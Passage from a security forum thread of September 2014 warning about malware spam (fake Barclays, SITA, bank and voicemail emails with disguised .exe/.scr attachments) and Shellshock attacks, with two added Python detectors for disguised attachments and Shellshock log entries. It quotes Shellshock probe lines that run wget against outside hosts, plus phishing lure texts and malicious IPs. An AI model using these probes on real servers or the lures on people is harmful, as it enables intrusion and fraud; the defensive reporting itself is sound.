       {_BODY_TXT}
    Dear [redacted],
    Please find the attached copy invoice which is showing as unpaid on our ledger.
    To download your invoice please click here ...


In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo....-documents.html
___

Fake Barclays SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Unable to complete your most recent Transaction.  Currently your transaction has a pending status.
    If the transaction was made by mistake please contact our customer service.
    For more details please download payment receipt ...


26 September 2014: PaymentReceipt262.zip:  Extracts to: PaymentReceipt262.exe
Current Virus total detections: 2/55* . This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustot...52/information/
195.110.124.133: https://www.virustot...33/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
 



Edited by AplusWebMaster, 26 September 2014 - 12:17 PM.

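The entries above (and those at the end of #1276) keep returning to the same trick: an archive that extracts to `something.pdf.exe` or a bare `.scr`, which Explorer shows as a PDF or a sound file when "hide extensions for known file types" is on. The following is an added example, not code from the thread or from the quoted blogs, that classifies attachment names the way a mail-gateway rule would and shows what the recipient actually sees on screen. The extension lists and the sample archive listing are assumptions constructed for illustration.

```python
"""Flag e-mail attachment names that disguise an executable as a document or media file.

Added example (not from the thread or the quoted blogs). The extension lists are
assumptions chosen for illustration; tune them to your own mail gateway policy.
"""
from typing import Dict, List, Optional

# Extensions Windows treats as directly runnable when double-clicked (assumed subset).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "vbe", "js", "jse", "hta"}
# Extensions the decoy icon usually imitates in these spam runs.
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "wav", "mp3", "jpg", "png", "txt"}


def split_name(name: str) -> List[str]:
    """Split 'x.pdf.exe' into ['x', 'pdf', 'exe'] (at most the last two dots)."""
    return name.lower().rsplit(".", 2)


def displayed_name(name: str) -> str:
    """What Explorer shows with 'hide extensions for known file types' on.

    Assumption: only the final, well-known extension is hidden, which is what
    turns 'BCA Banking 24.09.14.pdf.exe' into an apparent PDF.
    """
    parts = split_name(name)
    if len(parts) >= 2 and parts[-1] in EXECUTABLE_EXTS | DECOY_EXTS:
        return name[: -(len(parts[-1]) + 1)]
    return name


def classify_attachment(name: str) -> Optional[str]:
    """Return a reason if the name looks like a disguised executable, else None."""
    parts = split_name(name)
    if len(parts) < 2:
        return None
    ext = parts[-1]
    if ext not in EXECUTABLE_EXTS:
        return None
    if len(parts) >= 3 and parts[-2] in DECOY_EXTS:
        return f"double extension .{parts[-2]}.{ext} (displays as '{displayed_name(name)}')"
    return f"executable attachment .{ext}"


def scan_archive(archive_name: str, members: List[str]) -> Dict[str, str]:
    """Check every member of an attached ZIP; returns {member: reason} for suspicious ones."""
    findings = {}
    for member in members:
        reason = classify_attachment(member)
        if reason:
            findings[member] = reason
    return findings


# Constructed listing: archive names and their extracted contents as reported in the posts,
# plus one benign control archive.
SAMPLE_ARCHIVES = {
    "Invoice_09252014.zip": ["Invoice_09252014.scr"],
    "BCA Banking 24.09.14.pdf.zip": ["BCA Banking 24.09.14.pdf.exe"],
    "VOICE7838396453.zip": ["voicemessage.scr"],
    "PaymentReceipt262.zip": ["PaymentReceipt262.exe"],
    "quarterly_report.zip": ["quarterly_report.pdf"],
}

if __name__ == "__main__":
    for archive, members in SAMPLE_ARCHIVES.items():
        for member, reason in scan_archive(archive, members).items():
            print(f"{archive} -> {member}: {reason}")
```

The point of `displayed_name` is to make the social-engineering angle concrete: the rule fires on the real extension, while the user only ever sees the decoy one. A gateway that only looks at the outer `.zip` name misses all of these, which is why the check runs over the archive listing.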


#1289 AplusWebMaster


Posted 28 September 2014 - 04:30 AM

FYI...

Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo....-mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server and attempting to WGET back to their own network to enumerate vulnerable hosts.
    dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Past customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia...ians_in_Moldova

** http://pastebin.com/2mC1pXaJ

83.166.234.186: https://www.virustot...86/information/

83.166.234.133: https://www.virustot...33/information/
___

Shellshock in the Wild
- http://www.fireeye.c...n-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)

- http://www.symantec....g-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.o...y/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redha...rticles/1200223
CentOS: http://centosnow.blo...r-centos-5.html
Novell SUSE: http://support.novel...-2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues.

- https://rhn.redhat.c...-2014-1306.html
Last updated on: 2014-09-30

If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.....jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."
 



Edited by AplusWebMaster, 30 September 2014 - 03:29 PM.

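The access-log line quoted in the dynamoo excerpt above is the typical shape of a Shellshock probe: the `() { :;};` function-definition prefix lands in a header the web server exports as an environment variable, and whatever follows the closing brace is the command. The block below is an added example, not code from the thread or from dynamoo.com, that parses Apache combined-format lines (with the leading vhost:port seen in the post) and reports any request carrying that prefix in the request line, Referer or User-Agent. The sample lines are constructed using RFC 5737 documentation addresses and a placeholder host; the regexes are my own.

```python
"""Spot Shellshock (CVE-2014-6271) probes in Apache combined-format access logs.

Added example (not from the thread or from dynamoo.com). Sample log lines are
constructed, with RFC 5737 documentation addresses and a placeholder host.
"""
import re
from typing import Dict, List

# Apache combined log with a leading vhost:port, as in the line quoted in the post.
# Quoted fields may contain backslash-escaped quotes, which the probe's payload uses.
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# The tell-tale prefix: an exported function body "() { ... };" followed by a trailing command.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;(?P<cmd>.*)", re.S)

LOG_LINES = [
    # benign request (constructed)
    'example.com:80 198.51.100.7 - - [27/Sep/2014:03:01:12 +0100] '
    '"GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    # probe in User-Agent, shaped like the one in the post (constructed; placeholder host)
    'example.com:80 203.0.113.5 - - [27/Sep/2014:03:08:37 +0100] '
    '"GET / HTTP/1.0" 200 11044 "-" '
    '"() { :;}; /bin/bash -c \\"wget -q -O /dev/null http://scanner.invalid/test/\\""',
    # probe in Referer (constructed)
    'example.com:80 203.0.113.9 - - [27/Sep/2014:04:15:02 +0100] '
    '"GET /cgi-bin/status HTTP/1.1" 404 213 "() { :; }; echo vulnerable" "curl/7.37.0"',
]


def find_shellshock(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per request carrying a Shellshock prefix in any client-controlled field."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real deployment would count and skip these
        for field in ("request", "referer", "agent"):
            probe = SHELLSHOCK_RE.search(m.group(field))
            if probe:
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "field": field,
                    # unescape the \" that the log writer inserted so the command reads naturally
                    "command": probe.group("cmd").strip().replace('\\"', '"'),
                })
    return hits


def probe_sources(lines: List[str]) -> List[str]:
    """Distinct source addresses of probes, sorted, ready for a blocklist or WHOIS lookup."""
    return sorted({hit["ip"] for hit in find_shellshock(lines)})


if __name__ == "__main__":
    for hit in find_shellshock(LOG_LINES):
        print(f"{hit['time']} {hit['ip']} [{hit['field']}] {hit['command']}")
    print("sources:", ", ".join(probe_sources(LOG_LINES)))
```

Checking all three client-controlled fields matters because the prefix works in any header that CGI or mod_cgi turns into an environment variable, not just User-Agent. Matching on the `() {` prefix rather than on `wget` or a particular host keeps the rule independent of the payload, and `probe_sources` gives the list the post's author needed when deciding to block the whole range.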


#1290 AplusWebMaster


Posted 29 September 2014 - 09:36 AM

FYI...

Fake SITA SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in the statement.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...


Update: a slightly revised email coming out now but still the -same- malware attachment
    Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in statement.
    Any queries please contact us on 01934-524004.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...


29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
Current Virus total detections: 39/55* . This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411951945/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Invoice SPAM - XLS malware
- http://myonlinesecur...ke-xls-malware/
29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
  Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk

29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
Current Virus total detections: 25/54* . This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411980639/
... Behavioural information
TCP connections
82.165.38.206: https://www.virustot...06/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Bank SPAM - leads to malware
- http://blog.dynamoo....rcial-bank.html
29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
    Lloyds Commercial Bank "Important - Commercial Documents"
    From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date:     29 September 2014 11:03
    Subject:     Important - Commercial Documents
    Important account documents
    Reference: C947
    Case number: 18868193
    Please review BACs documents.
    Click link below, download and open document. (PDF Adobe file) ...

 HSBC Bank UK "Payment Advice Issued"
From:     HSBC Bank UK
Date:     29 September 2014 11:42
Subject:     Payment Advice Issued
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...


The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
* https://www.virustot...1e28b/analysis/
... Behavioural information
DNS requests
cuscorock .com (184.154.253.181)
formatech .es (81.88.48.71)
TCP connections
184.154.253.181: https://www.virustot...81/information/
81.88.48.71: https://www.virustot...71/information/
188.165.198.52: https://www.virustot...52/information/
___

Fake Order SPAM
- http://myonlinesecur...161864-malware/
29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email. All subjects have a random number involved and some have bad spelling mistakes, including:
- Order statsus: Order confirmation: 9618161864
- Order info: 32257958734
- Payment status: 93612666937
- Payment info: 21714421631
- Payment confirmation: 27863161481
The email looks like ( slightly different versions all with different names and phone numbers and companies):
Greetings,
 Your order #9618161864 will be shipped on 01.10.2014.
Date: September 29, 2014. 12:12pm
Price: £156.77
Transaction number: 9AECB76F37D22F21
 Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
 Kind regards,
Sales Department
Tiana Haggin ...


Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe

Current Virus total detections: 3/55* . This Order statsus: Order confirmation: 9618161864 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice  instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411991708/
... Behavioural information
TCP connections
213.186.33.19: https://www.virustot...19/information/
23.62.99.24: https://www.virustot...24/information/
213.186.33.4: https://www.virustot....4/information/
___

More Fake Voicemail SPAM - fake wav malware
- http://myonlinesecur...ke-wav-malware/
29 Sep 2014 - "'New Voicemail Message SUY-301' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
  The Voice Mail message has been uploaded to the following web
    address ...
    You can play this Voice Mail on most computers.
    Please do not reply to this message. This is an automated message which
    comes from an unattended mailbox.
    This information contained within this e-mail is confidential to, and is
    for the exclusive use of the addressee(s).
    If you are not the addressee, then any distribution, copying or use of this
    e-mail is prohibited.
    If received in error, please advise the sender and delete/destroy it
    immediately.
    We accept no liability for any loss or damage suffered by any person
    arising from use of this e-mail.


... the link in the email is broken because the idiots who crafted the email messed up the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
Current Virus total detections: 1/55* . This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1412003182/
___

'Mailbox Has Exceeded The Storage Limit' - Phish ...
- https://blog.malware...ge-limit-phish/
Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
    “Kindly Re-Validate Your Mailbox
    Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
    To renew the mailbox,
    click link below: [removed]
    Thank you!
    Web mail system administrator!
    WARNING! Protect your privacy. Logout when you are done and completely
    exit your browser.”


The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
___

Bash Bug vulnerability
- http://www.symantec....g-vulnerability
Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
> http://www.symantec....am-600px_v2.png
... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."

Table of C&C Servers:
- http://blog.trendmic...09/Table-01.jpg

89.238.150.154: https://www.virustot...54/information/
108.162.197.26: https://www.virustot...26/information/
162.253.66.76: https://www.virustot...76/information/
213.5.67.223: https://www.virustot...23/information/
 



Edited by AplusWebMaster, 29 September 2014 - 01:17 PM.

